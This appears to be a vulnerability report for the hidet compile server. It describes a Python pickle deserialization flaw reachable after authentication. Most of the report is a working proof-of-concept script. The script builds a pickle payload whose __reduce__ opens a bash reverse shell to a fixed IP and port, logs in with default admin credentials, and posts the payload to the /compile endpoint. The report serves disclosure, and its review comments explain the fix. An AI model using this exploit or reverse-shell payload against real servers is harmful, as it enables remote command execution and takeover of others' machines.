
hidet - pickle.loads

Describe the bug

At line 126 of apps/compile_server/resources/compilation.py, once a client has passed the compile server's authentication, the request data is exposed to a Python deserialization attack (pickle.loads), which can achieve command execution, etc.

Additional context

import pickle
import base64
import requests
import json

class System(object):
    """Proof-of-concept object whose pickled form runs a shell command on load.

    pickle calls ``__reduce__`` when serialising and stores the returned
    ``(callable, args)`` pair; the unpickler later calls ``callable(*args)``.
    The receiving side needs nothing from this class, which is why calling
    ``pickle.loads`` on client-supplied bytes amounts to running code the
    client chose.
    """
    def __reduce__(self):
        # Imported locally; only the reference to os.system ends up in the pickle.
        import os
        # The command redirects an interactive bash session over TCP to the host
        # and port written in the string. It runs in whichever process unpickles
        # the bytes, with that process's privileges.
        return (os.system,('bash -c "bash -i >& /dev/tcp/100.92.79.102/8899 0>&1"',))

# Build the payload: pickling the instance records the os.system call returned
# by System.__reduce__, not any state of the object itself.
code = System()

data1  =  pickle.dumps(code)

# Printed for reference only; the request further down sends the raw bytes in
# data1, not this base64 form.
print(base64.b64encode(data1))

# Default username and password, per the report.
# NOTE(review): if a deployment still accepts these, the authentication step
# below is no barrier in front of /compile -- confirm how they are provisioned.
auth_data = """{
  "username": "admin",
  "password": "admin_password"
}"""

auth_header = {
    "content-type": "application/json"
}

auth_url = "http://100.92.79.102:3281/auth"

# Log in against the /auth endpoint to obtain a bearer token.
auth_res = requests.post(auth_url, data=auth_data, headers=auth_header)

print(auth_res.text)

# The response body is parsed as JSON and must carry an "access_token" field.
token = json.loads(auth_res.text)

headers = {
    "authorization":"Bearer " + token["access_token"]
}

# The pickle bytes are the entire body of the authenticated POST to /compile.
# Per the report, the server hands this body to pickle.loads, at which point the
# command recorded by System.__reduce__ runs inside the server process.
# NOTE(review): the server-side remedy is to stop unpickling request bodies
# (accept a data-only format such as JSON, or verify an HMAC over the payload
# before deserialising) and to replace the default credentials; confirm against
# the server code, which is not shown here.
res = requests.post('http://100.92.79.102:3281/compile',headers=headers, data=data1)
print(res.text)
